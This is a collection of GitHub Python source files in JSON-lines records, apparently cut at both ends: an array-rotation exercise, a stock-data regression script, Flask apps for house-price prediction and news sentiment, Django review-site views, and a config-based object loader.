win32serviceutil.HandleCommandLine(AppServerSvc)\n","repo_name":"beeven/gbase-service","sub_path":"testservice_async.py","file_name":"testservice_async.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70101286954","text":"class Solution:\n \"\"\"\n @param: nums: An integer\n @return:\n \"\"\"\n\n def recoverRotatedSortedArray(self, nums):\n length = len(nums)\n i = 0\n for i in range(1, length):\n if nums[i] < nums[i - 1]:\n break\n else:\n return\n self.__reverse(nums, 0, i)\n self.__reverse(nums, i, length)\n self.__reverse(nums, 0, length)\n\n def __reverse(self, nums, left, right):\n l, r = left, right - 1\n while l < r:\n tempVal = nums[l]\n nums[l] = nums[r]\n nums[r] = tempVal\n l, r = l + 1, r - 1\n","repo_name":"craig04/lintCode_Python","sub_path":"lintCode/lt_039_recover_rotated_sorted_array.py","file_name":"lt_039_recover_rotated_sorted_array.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5636232475","text":"#!/usr/bin/env python\r\n##\r\nfrom stockObject import stockObject\r\nfrom financialObject import financialObject\r\nfrom core import dbConnection\r\nimport plotly.plotly as py\r\nimport plotly\r\nimport plotly.graph_objs as go\r\nfrom datetime import datetime, timedelta\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport scipy\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\n#input stock_f, array of financial info to be analyzed (revenue,profit,cash,equity,eps, or debt) and pricevstime\r\n#output array of analyzed financial info\r\ndef financialChangevsTime(stock_f,financialInfo,pricevsTime):\r\n counter =0\r\n for i in financialInfo:\r\n stock_f.getFinancials(i)\r\n if i == 'Revenue':\r\n data = np.zeros(len(stock_f.revenue))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.revenue[x+1]/stock_f.revenue[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.revenue).index.values, columns = ['revenue_change'])\r\n data['revenue'] = stock_f.revenue\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Profit':\r\n data = np.zeros(len(stock_f.profit))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.profit[x+1]/stock_f.profit[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.profit).index.values, columns = [\"profit_change\"])\r\n data['profit'] = stock_f.profit\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Cash':\r\n data = np.zeros(len(stock_f.cash))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.cash[x+1]/stock_f.cash[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.cash).index.values, columns = ['cash_change'])\r\n data['cash'] = stock_f.cash\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Equity':\r\n data = np.zeros(len(stock_f.equity))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.equity[x+1]/stock_f.equity[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.equity).index.values, columns = ['equity_change'])\r\n data['equity'] = stock_f.equity\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Eps':\r\n data = np.zeros(len(stock_f.eps))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.eps[x+1]/stock_f.eps[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.eps).index.values, columns = ['eps_change'])\r\n data['eps'] = stock_f.eps\r\n financialInfo[counter] = data[1:]\r\n counter+=1\r\n elif i == 'Debt':\r\n data = 
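np.zeros(len(stock_f.debt))\r\n # same percent-change pattern as the branches above: (x[t+1]/x[t] - 1) * 100;\r\n # a single helper taking the series and a column name would collapse this if/elif ladder.\r\n data = 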
np.zeros(len(stock_f.debt))\r\n for x in range(len(data)-1):\r\n data[x+1]= (stock_f.debt[x+1]/stock_f.debt[x]-1)*100\r\n data = pd.DataFrame(data,(stock_f.debt).index.values, columns = [\"debt_change\"])\r\n data['debt'] = stock_f.debt\r\n financialInfo[counter] = data[1:]\r\n counter+=1 \r\n financialsArray = addCorrespondingPrice(financialInfo,pricevsTime)\r\n return financialsArray\r\n\r\n#inputs stockObject\r\n#outputs price Change vs time and price vs time of desired stock\r\ndef priceChangevsTime(stock):\r\n price = stock.requested_data['closing_price']\r\n dates = stock.requested_data.index.values\r\n priceChange = []\r\n for x in range(len(price)-1):\r\n change = float(price[x+1]/price[x])\r\n priceChange.extend([change]) \r\n data = pd.Series(priceChange,dates[1:], name = 'closing_price')\r\n \r\n\r\n return data,price\r\n## Input an array with dataframes of financial info, and a dataframe with price vs time info\r\n## output : attaches corresponding price vs time to financial info and returns an array\r\n## containing all Dataframes\r\ndef addCorrespondingPrice(financialsArray,pricevsTime):\r\n for i in financialsArray:\r\n i['closing_price']=float(0)\r\n counter = 0\r\n for x in range(len(i)):\r\n temp_date = i.index.values[counter]\r\n ## checking if date exists\r\n result = False\r\n while result is False:\r\n try:\r\n realDate = pricevsTime.index.get_loc(temp_date)\r\n result = True\r\n except KeyError:\r\n temp_date = temp_date -timedelta(days=1)\r\n else:\r\n temp_price = float(pricevsTime[realDate])\r\n i['closing_price'][counter] = temp_price\r\n counter+=1\r\n return financialsArray\r\n\r\n#input: array of financial arrays (must contain 6 dataframes) to plot and i. i: 0= plot change , i: 1= plot numbers\r\ndef plotFinancial(financialInfoArray,i): \r\n \r\n fig = plotly.tools.make_subplots(rows=3, cols=2)\r\n \r\n #data\r\n trace0 = financialInfoArray[0].columns[i]\r\n trace1 = financialInfoArray[1].columns[i]\r\n trace2 = financialInfoArray[2].columns[i]\r\n trace3 = financialInfoArray[3].columns[i]\r\n trace4 = financialInfoArray[4].columns[i]\r\n trace5 = financialInfoArray[5].columns[i]\r\n \r\n trace0 = go.Scatter(x = financialInfoArray[0][trace0] , y = financialInfoArray[0]['closing_price'],\r\n mode = 'markers', name = '%s' %trace0)\r\n trace1 = go.Scatter(x = financialInfoArray[1][trace1] , y = financialInfoArray[1]['closing_price'],\r\n mode = 'markers',name = '%s' %trace1)\r\n trace2 = go.Scatter(x = financialInfoArray[2][trace2] , y = financialInfoArray[2]['closing_price'],\r\n mode = 'markers',name = '%s' %trace2)\r\n trace3 = go.Scatter(x = financialInfoArray[3][trace3] , y = financialInfoArray[3]['closing_price'],\r\n mode = 'markers',name = '%s' %trace3)\r\n trace4 = go.Scatter(x = financialInfoArray[4][trace4] , y = financialInfoArray[4]['closing_price'],\r\n mode = 'markers',name = '%s' %trace4)\r\n trace5 = go.Scatter(x = financialInfoArray[5][trace5] , y = financialInfoArray[5]['closing_price'],\r\n mode = 'markers',name = '%s' %trace5)\r\n\r\n \r\n data = [trace0,trace1,trace2,trace3,trace4,trace5]\r\n \r\n fig.append_trace(data[0], 1, 1)\r\n fig.append_trace(data[1], 1, 2)\r\n fig.append_trace(data[2], 2, 1)\r\n fig.append_trace(data[3], 2, 2)\r\n fig.append_trace(data[4], 3, 1)\r\n fig.append_trace(data[5], 3, 2)\r\n\r\n fig['layout']['title'] = 'Financials vs Price'\r\n fig['layout']['showlegend'] = True\r\n fig['layout'].update(height=1000, width=1000)\r\n \r\n plotly.offline.plot(fig, filename='plot.html')\r\n\r\ndef 
machineLearningAlgorithm(input_X,input_Y):\r\n # training Data\r\n train_X = np.asarray(input_X['revenue'])\r\n train_Y = np.asarray(input_Y)\r\n print(train_X)\r\n print(train_Y)\r\n print(train_X.shape)\r\n #algorithm parameters\r\n learning_rate = 0.1\r\n training_epochs = 1000\r\n display_step = 200\r\n # Data Set Paramaters\r\n n_features = 1\r\n numLabels = 20\r\n \r\n # Output layer\r\n X = tf.placeholder(tf.float32) ## input\r\n Y = tf.placeholder(tf.float32) ## output\r\n\r\n # Output layer\r\n W = tf.Variable(tf.random_normal([numLabels, n_features]), name=\"weights\")\r\n b = tf.Variable(tf.random_normal([n_features]), name=\"biases\")\r\n\r\n \r\n # Construct a linear model\r\n pred = tf.add(tf.multiply(X, W), b)\r\n \r\n # Mean squared error\r\n cost = tf.reduce_sum(tf.pow(pred-Y, 2))/(2*n_features)\r\n \r\n # Gradient descent\r\n # Note, minimize() knows to modify W and b because Variable objects are trainable=True by default\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\r\n \r\n # Initialize the variables\r\n init = tf.global_variables_initializer()\r\n \r\n # Start training\r\n with tf.Session() as sess:\r\n # Run the initializer\r\n sess.run(init)\r\n \r\n # Fit all training data\r\n for epoch in range(training_epochs):\r\n for (x, y) in zip(train_X, train_Y):\r\n sess.run(optimizer, feed_dict={X: x, Y: y})\r\n\r\n # Display logs per epoch step\r\n if (epoch+1) % display_step == 0:\r\n c = sess.run(cost, feed_dict={X: train_X, Y:train_Y})\r\n print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(c), \\\r\n \"W=\", sess.run(W), \"b=\", sess.run(b))\r\n \r\n # Graphic display\r\n fig = plt.figure()\r\n plt.plot(train_X, train_Y, 'ro', label='Original data')\r\n plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\r\n plt.legend()\r\n fig.savefig('optimization.png')\r\n \r\ndef main():\r\n stock = stockObject()\r\n name = sys.argv[1]\r\n stock.init_date = sys.argv[2]\r\n stock.final_date = sys.argv[3]\r\n stock.stock_name = name+'_1d'\r\n \r\n # getting stock price info\r\n stock.getData_df()\r\n (priceChange_vsTime,pricevsTime) = priceChangevsTime(stock)\r\n dates = pricevsTime.index.values\r\n \r\n #getting financial info\r\n stock_f = financialObject()\r\n stock_f.name = name+'_f'\r\n financialArray = financialChangevsTime(stock_f,['Revenue','Profit','Cash','Equity','Eps','Debt'],pricevsTime)\r\n # creating financial arrays with all info needed \r\n revvsTime = financialArray[0]\r\n profvsTime = financialArray[1]\r\n cashvsTime = financialArray[2]\r\n equivsTime = financialArray[3]\r\n epsvsTime = financialArray[4]\r\n debtvsTime = financialArray[5]\r\n #plotting data\r\n #plotdata = [revvsTime,profvsTime,cashvsTime,equivsTime,epsvsTime,debtvsTime]\r\n #plotFinancial(plotdata,1)\r\n \r\n #rearranging data for model .Using last 5 years\r\n years = 5*4\r\n datax = pd.DataFrame()\r\n datax['eps']=epsvsTime['eps'][:years]\r\n datax['revenue']=revvsTime['revenue'][:years]\r\n datax['profit']=profvsTime['profit'][:years]\r\n datax['cash']=cashvsTime['cash'][:years]\r\n datax['equity']=equivsTime['equity'][:years]\r\n datax['debt']=debtvsTime['debt'][:years]\r\n\r\n datay = pd.DataFrame()\r\n datay['eps']=epsvsTime['closing_price'][:years]\r\n datay['revenue']=revvsTime['closing_price'][:years]\r\n datay['profit']=profvsTime['closing_price'][:years]\r\n datay['cash']=cashvsTime['closing_price'][:years]\r\n datay['equity']=equivsTime['closing_price'][:years]\r\n 
datay['debt']=debtvsTime['closing_price'][:years]\r\n \r\n #rearranging data for model\r\n train_X = datax\r\n train_Y = datay['eps']/datay['eps'].max()\r\n# input --> weights --> hidden l1 (func)--> weights --> hidden l2 (func)--> etc..\r\n# compare output and intended output (cost)\r\n# optimize cost --> optimizer\r\n#back propagation \r\n##--> feed forward + backprop = epoch\r\n\r\n \r\n #Dividing everything over max value\r\n train_X['eps'] = train_X['eps']/train_X['eps'].max()\r\n train_X['revenue'] = train_X['revenue']/train_X['revenue'].max()\r\n train_X['profit'] = train_X['profit']/train_X['profit'].max()\r\n train_X['cash'] = train_X['cash']/train_X['cash'].max()\r\n train_X['equity'] = train_X['equity']/train_X['equity'].max()\r\n train_X['debt'] = train_X['debt']/train_X['debt'].max()\r\n\r\n \r\n machineLearningAlgorithm(train_X,train_Y)\r\n\r\n\r\nif __name__=='__main__':\r\n main()","repo_name":"jonathanb150/ljb","sub_path":"html/algorithms/newAlgo.py","file_name":"newAlgo.py","file_ext":"py","file_size_in_byte":11246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9357772249","text":"import pandas as pd\nimport numpy as np\nfrom flask import Flask, request, render_template\nimport xgboost\nimport pickle\nimport os\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nfrom selenium import webdriver\n\n\n# Create Flask App\napp = Flask(__name__)\n\n# Load the scalar and regression model pickle files\nscalar_pk = pickle.load(open(\"hp_scalar.pkl\",\"rb\"))\nxgbmodel_pk = pickle.load(open(\"hp_xgbmodel.pkl\",\"rb\"))\n\n# Loading housedata and average price data\ndf_housedata = pd.read_csv(\"formatted_housedata.csv\")\naverage_price_df = pd.read_csv(\"average_price_df.csv\")\n\n# Create city list for dropdown\ncity_list = average_price_df[\"primary_city\"].tolist()\n\n# Homepage app route\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\",city_list=city_list)\n\n# Predict app route\n@app.route(\"/predict\", methods=['GET',\"POST\"])\ndef predict_api():\n # Get input from form\n sqft_living = request.form.get(\"sqft_living\")\n grade = request.form.get(\"grade\")\n sqft_above = request.form.get(\"sqft_above\")\n bathrooms = request.form.get(\"bathrooms\")\n city = request.form.get(\"city\")\n view = request.form.get(\"view\")\n sqft_basement = request.form.get(\"sqft_basement\")\n bedrooms = request.form.get(\"bedrooms\")\n\n # Get city rank\n city_rank = average_price_df.loc[average_price_df.primary_city == city, \"city_rank\"].values[0]\n\n # Filter data for current city\n predict_filter_df = df_housedata[df_housedata[\"city_rank\"] == city_rank]\n\n # Create input dataframe for prediction\n pred_df = pd.DataFrame(columns=[\"sqft_living\",\"grade\",\"sqft_above\",\"bathrooms\",\"city_rank\",\"view\",\"sqft_basement\",\"bedrooms\"])\n pred_df[\"sqft_living\"] = [sqft_living]\n pred_df[\"grade\"] = grade\n pred_df[\"sqft_above\"] = sqft_above\n pred_df[\"bathrooms\"] = bathrooms\n pred_df[\"city_rank\"] = city_rank\n pred_df[\"view\"] = view\n pred_df[\"sqft_basement\"] = sqft_basement\n pred_df[\"bedrooms\"] = bedrooms\n\n # Fill in mean value for columns that have no data\n for column in pred_df:\n if pred_df.loc[0,column] == \"\":\n pred_df.loc[0,column] = predict_filter_df.groupby(\"city_rank\")[column].mean().round(0).values[0]\n\n # Scale the prediction input dataset \n pred_scaled = scalar_pk.transform(pred_df)\n \n # Predict house price using xgboost model\n prediction = 
xgbmodel_pk.predict(pred_scaled)\n prediction = np.exp(prediction)\n\n # Rename columns for display in HTML\n pred_details = pred_df.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\" })\n pred_details[\"City\"] = city\n pred_details = pred_details[[\"City\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n\n # Get Maximum Price Row and format for html display \n max_details = predict_filter_df[predict_filter_df.price == predict_filter_df.price.max()]\n max_details['price'] = max_details['price'].astype('int64') \n max_details = max_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n max_details[\"City\"] = city\n max_details[\"Price\"] = max_details[\"Price\"].map(\"${:,.0f}\".format)\n max_details = max_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #max_details = max_details.transpose()\n\n # Get Maximum Price Row and format for html display \n min_details = predict_filter_df[predict_filter_df.price == predict_filter_df.price.min()]\n min_details['price'] = min_details['price'].astype('int64') \n min_details = min_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n min_details[\"City\"] = city\n min_details[\"Price\"] = min_details[\"Price\"].map(\"${:,.0f}\".format)\n min_details = min_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #min_details = min_details.transpose()\n \n # Get Maximum Price Row and format for html display \n predict_filter_df[\"Median_Price\"] = predict_filter_df.price.median()\n predict_filter_df[\"Diff_From_Median\"] = predict_filter_df['price'] - predict_filter_df[\"Median_Price\"]\n predict_filter_df[\"Diff_From_Median\"] = predict_filter_df[\"Diff_From_Median\"].abs()\n median_details = predict_filter_df[predict_filter_df.Diff_From_Median == predict_filter_df.Diff_From_Median.min()]\n median_details['price'] = median_details['price'].astype('int64') \n median_details = median_details.rename(columns={\"sqft_living\" : \"SQFT Living\",\n \"sqft_basement\" : \"SQFT Basement\",\n \"sqft_above\" : \"SQFT Above\",\n \"bedrooms\" :\"Bedrooms\",\n \"bathrooms\" : \"Bathrooms\",\n \"grade\" : \"Grade\",\n \"view\" : \"View\",\n \"price\" : \"Price\"})\n median_details[\"City\"] = city\n median_details[\"Price\"] = median_details[\"Price\"].map(\"${:,.0f}\".format)\n median_details = median_details[[\"City\",\"Price\",\"SQFT Living\",\"SQFT Above\",\"SQFT Basement\",\n \"Bedrooms\",\"Bathrooms\",\"View\",\"Grade\"]]\n #median_details = median_details.transpose() \n\n # Create html table for diaplay\n pred_table = pred_details.to_html(classes='data', header=True, index=False, justify=\"left\")\n max_table = max_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n min_table = 
min_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n median_table = median_details.to_html(classes='maxdata', header=True, index=False, justify=\"left\")\n\n return render_template(\"predict.html\", prediction=prediction[0],city_list=city_list,tables=[pred_table],\n maxtable=[max_table],mintable=[min_table],mediantable=[median_table])\n\n# Scrape app route\n@app.route(\"/Scrape\", methods=['GET',\"POST\"])\ndef scrape_api():\n\n def county_news(browser):\n # Visit the mars nasa news site\n url = 'https://patch.com/washington/seattle'\n browser.visit(url)\n \n # Optional delay for loading the page\n browser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n # Parse the HTML\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n try:\n slide_elem = news_soup.select_one('article')\n\n # Use the parent element to find the first `a` tag and save it as `news_title`\n news_title = slide_elem.find(\"h2\", class_=\"styles_Card__Title__vp17Z styles_Card__Title--Is-Serif__2ClLt\").get_text()\n news_wrapper = slide_elem.find(\"p\", class_=\"styles_Card__Description__3tUgd\").get_text()\n news_link_rel = slide_elem.find(\"a\", class_=\"styles_Card__Thumbnail__1-_Rw\").get(\"href\")\n news_link = f'https://patch.com{news_link_rel}'\n news_pic = slide_elem.find(\"img\", class_=\"styles_Card__ThumbnailImage__2aX1C is-lazy-loaded\").get(\"src\")\n\n except AttributeError:\n return None, None\n \n return news_title,news_wrapper,news_link,news_pic\n\n chrome_options = webdriver.ChromeOptions()\n chrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n driver = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=chrome_options)\n\n # Initiate headless driver for deployment\n browser = Browser(\"chrome\", executable_path=\"chromedriver\", headless=True)\n news_title, news_wrapper,news_link,news_pic = county_news(browser)\n # scrape_date = scraping.scrape_all()\n # map_pic = scrape_date[\"featured_image\"]\n # news_title = scrape_date[\"news_title\"]\n # news_wrapper = scrape_date[\"news_wrapper\"]\n # news_link = scrape_date[\"news_link\"]\n # news_pic = scrape_date[\"news_pic\"]\n return render_template(\"scrape.html\",news_title=news_title,news_wrapper=news_wrapper,news_link=news_link,news_pic=news_pic)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ssathyanath/House_Price_Prediction","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14510050210","text":"import json\nfrom flask import Flask, jsonify\nimport requests\nfrom textblob import TextBlob\nfrom flask_cors import CORS\nimport configparser\n\napp = Flask(__name__)\nCORS(app)\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nAPI_KEY = config.get('API_KEYS', 'api_key') # Replace with your News API key\n\n@app.route('/news')\ndef get_news():\n # Make a request to the News API\n url = f'https://newsapi.org/v2/top-headlines?country=us&apiKey={API_KEY}'\n response = requests.get(url)\n\n if response.status_code == 200:\n news_data = response.json()\n categorized_news = categorize_news(news_data)\n return json.dumps(categorized_news) # Serialize the data as JSON\n else:\n return jsonify({'error': 'Failed to fetch news 
data'})\n\ndef categorize_news(news_data):\n categorized_news = {\n 'happy': 0,\n 'sad': 0,\n 'angry': 0,\n 'optimistic': 0,\n 'pessimistic': 0\n }\n\n # Extract articles from the news data\n articles = news_data.get('articles', [])\n\n for article in articles:\n title = article.get('title', '')\n description = article.get('description', '')\n content = f'{title}. {description}'\n\n # Perform sentiment analysis using TextBlob\n blob = TextBlob(content)\n sentiment = blob.sentiment.polarity\n\n # Categorize article based on sentiment\n if sentiment > 0.2:\n categorized_news['happy'] += 1\n elif sentiment < -0.2:\n categorized_news['sad'] += 1\n elif sentiment > 0:\n categorized_news['optimistic'] += 1\n elif sentiment < 0:\n categorized_news['pessimistic'] += 1\n else:\n categorized_news['angry'] += 1\n\n return categorized_news\n\nif __name__ == '__main__':\n # Run the app server on localhost:5000\n app.run('localhost', 5000)","repo_name":"danish-ali/CapstoneBackend","sub_path":"NewsService.py","file_name":"NewsService.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15901051989","text":"\nfrom django.db.models import CharField, Value, Q\nfrom django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.decorators import login_required\n\nfrom . import forms\nfrom authentication import models as auth_models\nfrom review import models as review_models\nfrom review.forms import ReviewForm, TicketForm\n\nfrom itertools import chain\n\n# Create your views here.\n\n\ndef collect_followers(current_user):\n followers_queryset = current_user.followers.all()\n followers = [follower for follower in followers_queryset]\n followers.append(current_user)\n return followers\n\n\ndef collect_tickets(current_user):\n followers = collect_followers(current_user)\n tickets_raw = review_models.Ticket.objects.filter(user__in=followers)\n tickets = tickets_raw.annotate(content_type=Value('ticket', CharField()))\n return tickets\n\n\ndef collect_reviews(current_user):\n followers = collect_followers(current_user)\n review_raw = review_models.Review.objects.filter(\n Q(user__in=followers) | Q(ticket__user=current_user))\n review = review_raw.annotate(content_type=Value('review', CharField()))\n return review\n\n\n@login_required\ndef home(request):\n tickets = collect_tickets(request.user)\n reviews = collect_reviews(request.user)\n feed_ready = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created, reverse=True)\n return render(request, \"review/home.html\",\n context={\"feed_ready\": feed_ready})\n\n\n@login_required\ndef your_post(request):\n tickets_raw = review_models.Ticket.objects.filter(user=request.user)\n tickets = tickets_raw.annotate(content_type=Value('ticket', CharField()))\n reviews_raw = review_models.Review.objects.filter(user=request.user)\n reviews = reviews_raw.annotate(content_type=Value('review', CharField()))\n posts = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created, reverse=True)\n\n return render(request, \"review/yourpost.html\", context={\"posts\": posts})\n\n\n@login_required\ndef follows(request):\n user_follows = request.user.followers.all()\n following_users = review_models.UserFollows.objects.filter(\n followed_user=request.user)\n form = forms.addFollowForm()\n message = \"\"\n if request.method == \"POST\":\n form = forms.addFollowForm(request.POST)\n if form.is_valid():\n 
user_to_add = form.cleaned_data[\"followed_user_name\"]\n if not auth_models.CustomUser.objects.filter(\n username=user_to_add).exists():\n message = \"L'utilisateur n'existe pas\"\n else:\n current_user = request.user\n if not current_user.username != user_to_add:\n message = \"Vous ne pouvez pas vous suivre vous même\"\n else:\n user_to_follow = auth_models.CustomUser.objects.get(\n username=user_to_add)\n try:\n follow = review_models.UserFollows()\n follow.user = request.user\n follow.followed_user = user_to_follow\n follow.save()\n message = f\"Vous suivez désormais {user_to_follow}\"\n except IntegrityError:\n message = f\"vous suivez déjà {user_to_add}\"\n\n return render(request, \"review/follows.html\",\n context={\"form\": form, \"message\": message,\n \"user_follows\": user_follows,\n \"following_users\": following_users})\n\n\n@login_required\ndef ticket(request):\n form = forms.TicketForm()\n if request.method == \"POST\":\n form = forms.TicketForm(request.POST, request.FILES)\n if form.is_valid():\n ticket = form.save(commit=False)\n ticket.user = request.user\n ticket.save()\n return redirect(\"home\")\n return render(request, \"review/ticket.html\", context={\"form\": form})\n\n\n@login_required\ndef ticket_and_review_upload(request):\n ticket_form = forms.TicketForm()\n review_form = forms.ReviewForm()\n if request.method == \"POST\":\n ticket_form = forms.TicketForm(request.POST, request.FILES)\n review_form = forms.ReviewForm(request.POST)\n if any([ticket_form.is_valid(), review_form.is_valid()]):\n ticket = ticket_form.save(commit=False)\n ticket.user = request.user\n ticket.review_count = 1\n ticket.save()\n review = review_form.save(commit=False)\n review.user = request.user\n review.ticket = ticket\n review.save()\n return redirect(\"home\")\n context = {\"ticket_form\": ticket_form,\n \"review_form\": review_form,\n }\n return render(request, \"review/fullreview.html\", context=context)\n\n\n@login_required\ndef ticket_update(request, id):\n ticket = review_models.Ticket.objects.get(id=id)\n if ticket.user == request.user:\n if request.method == 'POST':\n form = TicketForm(request.POST, request.FILES, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect(\"home\")\n else:\n form = TicketForm(instance=ticket)\n return render(request, \"review/ticket_update.html\",\n {\"form\": form, \"post\": ticket})\n else:\n message = \"Vous ne pouvez pas modifier \\\n un ticket crée par un autre utilisateur\"\n return render(request,\n \"review/ticket_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef review_update(request, id):\n review = get_object_or_404(review_models.Review, id=id)\n if review.user == request.user:\n if request.method == 'POST':\n form = ReviewForm(request.POST, instance=review)\n if form.is_valid():\n form.save()\n return redirect(\"home\")\n else:\n form = ReviewForm(instance=review)\n return render(request,\n \"review/review_update.html\",\n {\"form\": form, \"post\": review})\n else:\n message = \"Vous ne pouvez pas modifier une critique \\\n crée par un autre utilisateur\"\n return render(request,\n \"review/review_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_ticket(request, id):\n ticket_to_delete = review_models.Ticket.objects.get(id=id)\n if ticket_to_delete.user == request.user:\n if request.method == \"POST\":\n ticket_to_delete.delete()\n return redirect(\"home\")\n return render(request,\n \"review/delete_ticket.html\",\n {\"post\": ticket_to_delete})\n else:\n message = \"Vous ne 
pouvez pas supprimer un \\\n ticket crée par un autre utilisateur\"\n return render(request,\n \"review/ticket_update.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_review(request, id):\n review_to_delete = review_models.Review.objects.get(id=id)\n ticket = review_to_delete.ticket\n if review_to_delete.user == request.user:\n if request.method == \"POST\":\n review_to_delete.delete()\n ticket.review_count = 0\n ticket.save()\n return redirect(\"home\")\n return render(request,\n \"review/review_delete.html\",\n {\"post\": review_to_delete})\n else:\n message = \"Vous ne pouvez pas supprimer un \\\n ticket crée par un autre utilisateur\"\n return render(request,\n \"review/review_delete.html\",\n {\"message\": message})\n\n\n@login_required\ndef delete_follower(request, key_id):\n user_to_unfollow = auth_models.CustomUser.objects.get(id=key_id)\n follow_relation = review_models.UserFollows.objects.filter(\n user=request.user, followed_user=user_to_unfollow)\n if request.method == \"POST\":\n follow_relation.delete()\n return redirect(\"follows\")\n return render(request,\n \"review/delete_follower.html\",\n {\"followed_user\": user_to_unfollow})\n\n\n@login_required\ndef answer_ticket(request, id):\n form = forms.ReviewForm()\n ticket = review_models.Ticket.objects.get(id=id)\n if ticket.review_count != 0:\n message = \"Ce ticket a déjà une critique, \\\n vous ne pouvez en créer une nouvelle\"\n return render(request,\n \"review/create_review.html\",\n {\"message\": message})\n else:\n if request.method == \"POST\":\n form = forms.ReviewForm(request.POST)\n if form.is_valid():\n ticket.review_count = 1\n review = form.save(commit=False)\n review.user = request.user\n review.ticket = ticket\n ticket.save()\n review.save()\n return redirect(\"home\")\n return render(request,\n \"review/create_review.html\",\n {\"form\": form, \"post\": ticket})\n","repo_name":"ClemRoy/litreview","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9910387017","text":"\nfrom typing import Dict, Any, Union, Optional, List, Callable\nfrom omegaconf import ListConfig, DictConfig\nimport importlib\nimport functools\nimport re\nimport cm.dist_util as dist\n\n\nLOG_FN_BLACKLIST = [\n \"cm.yt.processing.*\",\n \"cm.yt.encoding.*\",\n \"torch.randn_like\",\n]\n\n\ndef instantiate_from_config(config: Dict, *args, **kwargs):\n if \"target\" not in config:\n raise KeyError(\"Expected key `target` to instantiate.\")\n params = config.get(\"params\", dict())\n target = config[\"target\"]\n if re.search(\"|\".join(LOG_FN_BLACKLIST), target) is None:\n dist.print0(f\"Instantiating {config['target']} with params {params}\")\n return get_obj_from_str(target)(*args, **params, **kwargs)\n\n\ndef get_obj_from_str(string: str, reload: bool = False):\n module, cls = string.rsplit(\".\", 1)\n if reload:\n module_imp = importlib.import_module(module)\n importlib.reload(module_imp)\n return getattr(importlib.import_module(module, package=None), cls)\n\n\ndef getattr_nested(obj, 